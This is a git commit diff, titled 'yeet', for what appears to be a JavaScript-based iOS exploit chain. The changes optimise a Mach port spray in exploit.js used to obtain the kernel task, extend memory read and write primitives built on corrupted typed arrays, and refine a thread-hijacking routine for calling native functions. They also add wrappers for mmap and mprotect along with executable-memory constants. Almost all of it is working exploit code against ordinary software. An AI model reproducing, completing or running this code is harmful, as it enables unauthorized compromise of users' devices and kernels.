yeet

5 files changed, 107 insertions, 31 deletions

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
 var req_init_port_set_address = 0x0
 var req_init_port_set_count = 0x4
 
+var task_self = 0;
 var kslide = 0;
 
 var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
 function copyinPort(kport, cnt) {
 	var err = malloc(4);
 	var ret = 0;
-	var self = mach_task_self();
+	var self = task_self;
 	var service = MACH_PORT_NULL;
 	var client = malloc(4);
 	var it = malloc(4);
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
 
 var kp = 0;
 function spray_ports(number_port_descs) {
-	printf("spray_ports\n");
+	printf("spray_ports %d\n", number_port_descs);
 	if (kp == 0) {
 		kp = malloc(4);
-		mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
-		mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+		mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+		mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
 	}
 
 	var mp = malloc(4);
 
-	mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
-	printf("%x\n", read_u32(mp));
-	mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+	mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+	var rmp = read_u32(mp);
+	mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
 
-	send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+	send_ports(rmp, read_u32(kp), 2, number_port_descs);
 	return mp;
 }
 
+function fast_log2(n) {
+	var i = 0;
+	while (n >>= 1) {
+		i++;
+	}
+
+	return i;
+}
+
+function fast_array_mul(arr, n) {
+	var tmp_arr = arr;
+	var done = 0;
+	for (var i = 0; i < fast_log2(n) + 2; i++) {
+		tmp_arr = tmp_arr.concat(tmp_arr);
+		done = (1 << i);
+	}
+
+	return tmp_arr;
+}
+
 function send_ports(target, payload, num, number_port_descs) {
 	var init_port_set = malloc(num * 4);
 
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
 		write_u32(init_port_set + (i << 2), payload);
 	}
 
-	var buf = malloc(0x1c + (number_port_descs * 0xc));
+	var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
 	write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
 
+	var new_buf_ = new Array();
+	var tmp = u32_to_u8x4(init_port_set);
+	new_buf_.push(tmp[0]);
+	new_buf_.push(tmp[1]);
+	new_buf_.push(tmp[2]);
+	new_buf_.push(tmp[3]);
+	tmp = u32_to_u8x4(num);
+	new_buf_.push(tmp[0]);
+	new_buf_.push(tmp[1]);
+	new_buf_.push(tmp[2]);
+	new_buf_.push(tmp[3]);
+	new_buf_.push(0);
+	new_buf_.push(0);
+	new_buf_.push(19);
+	new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+	var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+	fast_write_buf(buf + req_init_port_set, new_buf);
+
+	/*
 	for (var i = 0; i < number_port_descs; i++) {
 		write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
 		write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
 		write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
 		write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
 		write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
-	}
+	}*/
 
 	write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
 	write_u32(buf + req_head_msgh_request_port, target);
 	write_u32(buf + req_head_msgh_reply_port, 0);
 	write_u32(buf + req_head_msgh_id, 1337);
 
-	return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+	var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+	free(buf);
+
+	printf("%d %s\n", ret, mach_error_string(ret));
+
+	return ret;
 }
 
 function get_kernel_task() {
@@ -229,11 +278,13 @@ function get_kernel_task() {
 
 	sanity_port = malloc(4);
 
-	mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
-	mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+	task_self = mach_task_self();
+
+	mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+	mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
 	limits = malloc(4);
 	write_u32(limits, 1000);
-	mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+	mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
 
 	printf("starting exploit\n");
 
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 51fc055..325c490 100644..100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended");
 var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
 var IOIteratorNext = scall_wrapper("IOIteratorNext");
 var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-var mach_msg = scall_wrapper("mach_msg");
\ No newline at end of file
+var mach_msg = scall_wrapper("mach_msg");
+var mmap = scall_wrapper("mmap");
+var free = scall_wrapper("free");
+var mlock = scall_wrapper("mlock");
+var mprotect = scall_wrapper("mprotect");
\ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index 4d978ef..ee0a627 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11;
 var ARM_THREAD_STATE = 0x1;
 var LOG_SYSLOG = 0x28;
 
+var PROT_READ = 0x1;
+var PROT_WRITE = 0x2;
+var PROT_EXEC = 0x4;
+
+var MAP_PRIVATE = 0x2;
+var MAP_ANON = 0x1000;
+
 try {
 	puts("we out here in jsc");
 } catch (e) {
@@ -22,10 +29,6 @@ try {
 	puts = function (){};
 }
 
-function csbypass() {
-
-}
-
 function main() {
 	/*
 	 *  get slide and calculate slid base
@@ -45,8 +48,6 @@ function main() {
 	puts("we out here");
 	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
 
-//	csbypass();
-
 	printf("slide=0x%x\n", slide);
 	printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
 	printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 97a47b6..e382470 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) {
 	return call4arg(addy, r0, r1, r2, r3);
 }
 
+var rth = 0;
+
 function callnarg() {
 	if (arguments.length < 1) {
 		return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
@@ -153,8 +155,15 @@ function callnarg() {
 		calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
 		thread = read_u32(threadptr);
 		write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+		rth = read_u32(th);
+	}
+
+	if (rth === 0) {
+		rth = read_u32(th);
 	}
 
+//	calls4arg("thread_suspend", rth, 0, 0, 0);
+
 	/*
 	 *  write first 4 to r0-r3, rest to stack
 	 */
@@ -198,12 +207,8 @@ function callnarg() {
 	/*
 	 *  set the state
 	 */
-	calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-
-	/*
-	 *  probably un-necessary now, keeping in just in case for now
-	 */
-	calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+	calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+	calls4arg("thread_resume", rth, 0, 0, 0);
 
 	/*
 	 *  spin wait for return
@@ -212,15 +217,15 @@ function callnarg() {
 		/*
 		 *  reset, it's used as input for thread_state size
 		 */
-		write_u32(count, 0x100);
-		calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
+		write_u32(count, 17);
+		calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
 
 		/*
 		 *  if the pc is in (resolver, resolver + 8), suspend the thread
 		 *  (to not spin endlessly), read r0 and return
 		 */
 		if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
-			calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
+			calls4arg("thread_suspend", rth, 0, 0, 0);
 			return read_u32(thread_state);
 		}
 
@@ -262,7 +267,7 @@ function scall() {
 			args_to_pass.push(sptr(arguments[i]));
 		} else {
 			args_to_pass.push(arguments[i]);
-			if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+			if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) {
 				force_callnarg = true;
 			}
 		}
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 85cd132..ff12fdd 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) {
 	return buf;
 }
 
+function fast_write_buf(addy, buf) {
+	var upper_i = Math.floor(buf.length / 0x100);
+
+	for (var i = 0; i < upper_i; i++) {
+		u8x4 = u32_to_u8x4(addy + (i * 0x100));
+		parent[VECTOR_OFFSET + 0x0] = u8x4[0];
+		parent[VECTOR_OFFSET + 0x1] = u8x4[1];
+		parent[VECTOR_OFFSET + 0x2] = u8x4[2];
+		parent[VECTOR_OFFSET + 0x3] = u8x4[3];
+		for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) {
+			child[j % 0x100] = buf[j];
+		}
+	}
+}
+
 /*
  *  write uint8_t
  */